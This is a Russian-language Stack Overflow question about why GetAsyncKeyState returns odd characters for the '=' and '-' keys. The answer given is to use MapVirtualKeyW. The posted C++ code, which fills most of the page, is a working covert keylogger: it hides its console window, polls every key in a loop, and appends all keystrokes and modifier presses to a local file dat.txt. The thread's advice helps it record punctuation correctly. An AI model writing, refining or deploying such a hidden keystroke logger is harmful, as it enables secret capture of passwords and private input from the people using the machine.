# GetKeyState неверно обрабатывает некоторые клавиши

Tags: c++, winapi

Всем привет. GetKeyState получает неверные символы с некоторых клавиш клавиатуры.

Например: жму клавишу "D" выводит "D", а если нажать на клавишу "=" (61) выводит "╗" (187). Тоже самое и с клавишей "-" (45) выводит "╜" (189).

[image: Обработка клавиш]

Видео:

[bandicam 2020-09-26 04-58-50-445](https://vimeo.com/462039884) from [asdsd23125](https://vimeo.com/user123927045) on [Vimeo](https://vimeo.com).

```
#define _WIN32_WINNT 0x0500
#include <Windows.h>
#include <string>
#include <stdlib.h>
#include <stdio.h>
#include <iostream>
#include <fstream>



using namespace std;



void LOG(string input) {
    fstream LogFile;
    LogFile.open("dat.txt", fstream::app);
    if (LogFile.is_open()) {
        LogFile << input;
        LogFile.close();
    }
}


bool SpecialKeys(int S_Key) {
    switch (S_Key) {
    case VK_SPACE:
        cout << " ";
        LOG(" ");
        return true;
    case VK_RETURN:
        cout << "\n";
        LOG("\n");
        return true;
    case '¾':
        cout << ".";
        LOG(".");
        return true;
    case VK_SHIFT:
        cout << "#SHIFT#";
        LOG("#SHIFT#");
        return true;
    case VK_BACK:
        cout << "\b";
        LOG("\b");
        return true;
    case VK_RBUTTON:
        cout << "#R_CLICK#";
        LOG("#R_CLICK#");
        return true;
    case VK_CAPITAL:
        cout << "#CAPS_LOCK#";
        LOG("#CAPS_LCOK");
        return true;
    case VK_TAB:
        cout << "#TAB";
        LOG("#TAB");
        return true;
    case VK_UP:
        cout << "#UP";
        LOG("#UP_ARROW_KEY");
        return true;
    case VK_DOWN:
        cout << "#DOWN";
        LOG("#DOWN_ARROW_KEY");
        return true;
    case VK_LEFT:
        cout << "#LEFT";
        LOG("#LEFT_ARROW_KEY");
        return true;
    case VK_RIGHT:
        cout << "#RIGHT";
        LOG("#RIGHT_ARROW_KEY");
        return true;
    case VK_CONTROL:
        cout << "#CONTROL";
        LOG("#CONTROL");
        return true;
    case VK_MENU:
        cout << "#ALT";
        LOG("#ALT");
        return true;
    default: 
        return false;
    }
}



int main()
{
    ShowWindow(GetConsoleWindow(), SW_HIDE);
    char KEY = 'x';

    while (true) {
        Sleep(10);
        for (int KEY = 8; KEY <= 190; KEY++)
        {
            if (GetAsyncKeyState(KEY) == -32767) {
                if (SpecialKeys(KEY) == false) {

                    fstream LogFile;
                    LogFile.open("dat.txt", fstream::app);
                    if (LogFile.is_open()) {
                        LogFile << char(KEY);
                        LogFile.close();
                    }

                }
            }
        }
    }

    return 0;
}
```

Comment: `GetKeyState` ничего никуда не выводит

Comment: @user7860670 Хорошо... cout выводит. Так лучше?

Comment: @user7860670 Да, кстати, я НИГДЕ не писал, что вывод происходит с помощью GetKeyState

Comment: @user7860670 добавил код в описание. сейчас ещё видео запишу

Comment: В примере используется `GetAsyncKeyState`, а не `GetKeyState`. Но главное в том, что проверяется в них не символ, а виртуальный код клавиши. Клавиша 187 - это VK_OEM_PLUS и т.д. Чтобы получить код символа в кодировке UTF16, соответствующего некоторому коду клавиши, надо еще вызвать вызвать MapVirtualKeyW, а чтобы вывести символ UTF16 в cout или другой поток char его еще надо преобразовать в соответствующую одно- или много- байтовую кодировку.

Comment: @user7860670 Большое спасибо! MapVirtualKeyW помог решить задачу. 
P.s я новичок

Comment: @АнатолийЛиндеманн можете ответить на собственный вопрос ниже

Comment: Возможный дубликат вопроса: [Virtual-key codes, в файл не записываются несколько клавиш](https://ru.stackoverflow.com/questions/963904/virtual-key-codes-%d0%b2-%d1%84%d0%b0%d0%b9%d0%bb-%d0%bd%d0%b5-%d0%b7%d0%b0%d0%bf%d0%b8%d1%81%d1%8b%d0%b2%d0%b0%d1%8e%d1%82%d1%81%d1%8f-%d0%bd%d0%b5%d1%81%d0%ba%d0%be%d0%bb%d1%8c%d0%ba%d0%be-%d0%ba%d0%bb%d0%b0%d0%b2%d0%b8%d1%88)

Answer (score 1, accepted):

MapVirtualKeyW помог решить задачу